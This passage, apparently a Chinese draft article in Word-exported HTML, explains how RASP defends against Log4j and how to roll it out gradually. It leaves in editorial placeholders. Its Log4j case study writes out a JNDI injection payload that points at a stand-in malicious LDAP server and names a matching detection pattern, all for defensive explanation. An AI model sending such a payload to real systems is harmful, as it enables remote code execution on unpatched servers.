Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">打补丁也是一种方法,但同样对运维技术要求较高。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">RASP被认为是云原生领域最好的解决方案,基本无感知且效率最高。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">其他方法如升级、打补丁等需要左移,相对较慢且需要开发能力。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">4.3 RASP</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">案例剖析</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">（以</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">Log4j</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">为例）</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">{llm补充}</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">Log4j漏洞示例:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 假设有一个使用Log4j 2.14.1版本的Java Web应用程序,它记录用户输入的数据。攻击者可能会尝试利用以下恶意字符串进行攻击:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">```</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">${jndi:ldap://malicious-server.com/exploit}</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">```</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 这个字符串如果被Log4j处理,会触发JNDI注入,从攻击者控制的服务器下载并执行恶意代码。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> RASP应对方案(step by step):</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 1. 部署RASP:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>选择适合的RASP解决方案,如Contrast Security或Imperva RASP。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>将RASP agent集成到Java应用程序中,通常通过添加JVM参数实现。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>例如:<span style="mso-spacerun:yes;"> </span>java -javaagent:/path/to/rasp-agent.jar -jar your-application.jar</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 配置RASP规则:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>设置规则以检测JNDI查找操作。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>配置规则以识别可疑的LDAP/RMI URL模式。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 运行时监控:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP在应用程序运行时持续监控所有输入和方法调用。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>当Log4j处理日志消息时,RASP会拦截相关方法调用。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 检测攻击:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP检测到含有${jndi:ldap://...}模式的输入。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP识别出这是一个JNDI查找操作,可能导致远程代码执行。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 实时防护:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP立即阻止JNDI查找操作的执行。</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>阻止与外部恶意服务器的连接尝试。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 6. 无害化处理:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP可能会将可疑输入替换为无害字符串,如&#34;[已过滤]&#34;。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>允许应用程序继续运行,但不执行危险操作。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 7. 告警和日志:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP生成详细的安全事件日志,包括攻击时间、类型和来源。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>触发告警通知安全团队。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 8. 动态更新:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP可以通过云端更新防护规则,以应对新发现的攻击变种。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 9. 性能优化:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP持续监控自身对应用性能的影响,并进行必要的优化。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 10. 报告和分析:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">    </span>-<span style="mso-spacerun:yes;"> </span>生成攻击趋势报告,帮助团队了解威胁态势。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">    </span>-<span style="mso-spacerun:yes;"> </span>提供建议以进一步加强应用程序安全性。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 技术讲解:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> RASP通过在Java字节码级别进行插桩,能够监控和控制应用程序的关键操作。对于Log4j漏洞,RASP主要关注以下几点:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 1. 字符串解析: RASP监控Log4j的字符串解析过程,识别可能触发JNDI查找的模式。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. JNDI操作: RASP拦截所有JNDI相关的方法调用,如InitialContext.lookup()。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 网络连接: RASP监控网络连接尝试,阻止与未知或恶意服务器的连接。</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 类加载: RASP监控动态类加载操作,防止加载未经授权的远程类。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 上下文分析: RASP考虑调用栈和数据流,区分正常操作和潜在攻击。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 通过这种</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">深度防护方法</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">,RASP能够在不修改应用代码或等待补丁的情况下,有效防御Log4j漏洞攻击。同时,它的自适应特性使其能够应对未来可能出现的类似漏洞。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">4.4 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">运行时应用自我保护</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">(RASP)</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术的实施策略</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. RASP的必要性:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP技术现在已经比过去成熟很多</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>它能提供高效的运行时保护</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 实施建议:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>建议循序渐进实施,不要一步到位</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>先从提高软件成分分析(SCA)能力开始</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>使用交互式应用安全测试(IAST)等动态检测技术</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>进行SCA漏洞可达性和优先级的交叉验证</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>结合自动化渗透测试</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. RASP实施顺序:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>先在边缘系统实施,再到核心系统</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>这样可以让运营人员逐步适应</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 注意事项:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>RASP的稳定性需要与业务相关</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>可能会对业务产生一些影响</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>需要谨慎配置以平衡效率和影响</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 云原生:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>虽然原文没有直接提到云原生,但这种循序渐进、从边缘到核心的安全实施策略,与云原生环境的动态特性和微服务架构是契合的。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 总的来说,文章强调了在实施RASP时需要采取</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">谨慎和渐进</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">的方法,结合多种安全技术,以确保既能提高安全性,又能降低对业务的影响。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">4.5 RASP</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">是安全平行切面的一个应用</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">{线下请教兜哥</span><span 